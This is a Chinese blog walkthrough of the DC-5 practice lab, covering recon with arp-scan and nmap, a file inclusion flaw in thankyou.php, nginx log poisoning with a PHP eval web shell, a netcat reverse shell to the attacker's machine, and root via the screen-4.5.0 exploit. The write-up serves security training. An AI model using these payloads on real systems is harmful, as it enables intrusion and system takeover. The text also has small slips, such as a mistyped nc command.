靶场DC-5

文章描述了一位安全专家通过网络扫描、文件包含漏洞检测和利用,最终实现反弹shell并进行提权的过程。首先使用arp-scan和nmap识别目标IP及开放端口,然后通过文件包含漏洞探测和验证,进一步利用该漏洞读取系统文件。通过上传木马和利用蚁剑工具,成功反弹shell并寻找特殊权限的命令。最后,通过searchsploit搜索漏洞,编译并上传exploit文件,实现权限提升。
摘要由CSDN通过智能技术生成

0x001信息收集

由于本文的攻击机和靶机在同一个网络下,因此在kali上输入命令: arp-scan -l,显示如下:
在这里插入图片描述可判断出靶机的ip为192.168.88.130,接着使用nmap对该ip进行扫描,输入命令:nmap -sV -p- 192.168.88.129,开了两个端口80和111
在这里插入图片描述浏览器访问目标地址的80端口
在这里插入图片描述四处翻看一下,发现contact页面可以填信息,想着能不能上传木马,先随便写写看看有什么变化,发现提交之前还是2019,提交之后就变成了2018。然后刷新试试,发现不停地在变化。
在这里插入图片描述在这里插入图片描述这里面有一个传参动作,burp suite抓包看看,猜测可能存在独立的脚本文件,而这个文件被包含在了这个页面中,猜测存在文件包含漏洞。
在这里插入图片描述

0x002漏洞检测

发送到repeater,看看返回数据,不断点击,发现footer不断变化,说明这里可能存在一个独立的脚本文件,猜测是footer文件,这里其实也可以使用目录扫描工具扫描的,比如御剑。
在这里插入图片描述在这里插入图片描述说明是存在文件包含漏洞的。其实包含文件就这么几个,一一测试一下即可.当然也可以发送到intruder中进行标记,然后跑目录字典,实际来说,还是有要一个强大的目录字典,配合目录扫描工具(burpsuit也可以的)猜解的。

0x003漏洞验证

现在是确定存在文件包含漏洞了,接下来就要验证该漏洞如何利用了。改变访问路径为thankyou.php?file=/etc/passwd ,可以看到passwd文件在下侧显示了。
在这里插入图片描述为了验证后续输入命令是否生效,我们可以先查看ngnix的日志,已知对于配置了nginx的网站,无论网站有什么操作,都会被记录在/var/log/nginx/access.log和/var/log/nginx/error.log里面。
file=/var/log/nginx/access.log&zyh <?php @eval($_POST[123]);?>
在这里插入图片描述

0x005反弹shell

木马文件已经上传,接下来可以利用中国蚁剑或者其他网站管理工具连接访问,我采用的是中国蚁剑。
在这里插入图片描述再接下来进行反弹shell操作,首先在kali上开启监听,然后利用中国蚁剑打开网站的虚拟终端,反弹shell到我们的kali上,
指令:ne 192.168.190.128 6666 -e /bin/bash。
成功以后开启shell交互,命令:python -c “import pty;pty.spawn(‘/bin/bash’)”
在这里插入图片描述接下来找找看是否存在特殊权限的指令,指令:find / -perm -4000 2>/dev/null,发现screen-4.5.0比较可疑,这可能是一个第三方插件。
在这里插入图片描述

0x006漏洞利用

尝试用searchsploit搜索是否存在漏洞。
在这里插入图片描述在这里插入图片描述按照文件的说明,可分为三部分,将第一个框里内容保存为第一文件,名为libhax.c,编译结束会生成libhax.so文件。
同样地,第二个框里内容保存为rootshell.c文件,编译结束后生成rootshell文件。
将第三个框里内容保存为第三个文件,命名随意,我这里保存为run.sh。
在这里插入图片描述在这里插入图片描述编译好结束之后,将libhax.so,rootshell,run.sh上传至靶机的tmp目录下,上传的方式有很多,我直接采用中国蚁剑上传。
在这里插入图片描述在这里插入图片描述

0x007提权

上传成功的目录:
在这里插入图片描述可以看到有screens文件,然后输入bash ./run.sh
在这里插入图片描述编译成功,如果出现编译版本问题的错误,那么就直接上传到靶机再编译。
在这里插入图片描述查看用户权限
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值